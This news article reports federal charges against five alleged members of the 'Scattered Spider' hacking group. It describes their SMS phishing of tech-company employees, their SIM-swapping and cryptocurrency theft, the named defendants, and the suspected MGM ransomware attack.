Federal prosecutors in Los Angeles have unveiled criminal charges against five individuals suspected of being part of a hacking group that carried out numerous cyber intrusions at prominent U.S. technology companies from 2021 to 2023. The companies affected by these cyberattacks include LastPass, MailChimp, Okta, T-Mobile, and Twilio.
The five men, aged between 20 and 25, are believed to be part of a hacking conspiracy known as “Scattered Spider” and “Oktapus.” Their modus operandi involved using SMS-based phishing attacks to deceive employees at tech companies into divulging their credentials and one-time passcodes on phishing websites.
The phishing attempts typically required employees to click on a link and log in to a website that mimicked their employer’s Okta authentication page. Some messages informed employees that their VPN credentials were about to expire and needed updating, while others notified them of changes in their work schedule.
The group utilized newly-registered domains that often included the targeted company’s name, such as twilio-help[.]com and ouryahoo-okta[.]com. These phishing websites were short-lived, usually being online for just one or two hours, making them challenging to flag for anti-phishing and security services.
Furthermore, the phishing kits employed in these campaigns featured a concealed Telegram instant message bot that immediately forwarded any submitted credentials. This allowed the attackers to use the stolen information to log in as the targeted employee on the authentic employer website.
In August 2022, security firms gained access to the server collecting data from the Telegram bot, ultimately revealing the developer’s Telegram ID and handle, identified as “Joeleoli.” Investigators discovered that Joeleoli’s real identity is Joel Martin Evans, a 25-year-old from Jacksonville, North Carolina.
The group’s initial significant target in 2022 was Twilio, a company offering text messaging and phone call services. Subsequently, the hackers exploited their access to Twilio to target at least 163 of its customers, primarily aiming to steal cryptocurrency from both the companies and their employees.
The FBI disclosed that Tyler Buchanan orchestrated numerous SIM-swapping attacks to acquire a substantial amount of cryptocurrency, with reports stating he once possessed Bitcoins valued at $27 million. Notably, rival SIM-swappers orchestrated a home invasion against Buchanan in 2023, leading him to flee the UK following the incident.
Prosecutors also identified Noah Michael Urban as a key member of the group, operating under the aliases “Sosa,” “Elijah,” and “Kingbob.” Urban was apprehended in Florida for his involvement in multiple SIM-swapping attacks affecting various individuals in the music industry.
Moreover, Ahmed Hossam Eldin Elbadawy and Evans Onyeaka Osiebo, both from Texas, were named in the indictment, with Elbadawy controlling cryptocurrency accounts used to receive stolen funds. The group is also suspected of engaging in a ransomware attack against the MGM Resorts hotel chain in September 2023, causing significant disruptions across multiple MGM casinos.
The defendants face several charges, including conspiracy to commit wire fraud, conspiracy, aggravated identity theft, and wire fraud, with potential lengthy prison sentences if convicted. The Justice Department highlighted the severity of the offenses and the stringent penalties awaiting those found guilty.
These latest developments underscore the ongoing battle against cybercriminals who continue to target major technology companies with sophisticated phishing schemes and ransomware attacks. The collaborative efforts of law enforcement agencies and security firms play a crucial role in apprehending and prosecuting individuals involved in such malicious activities.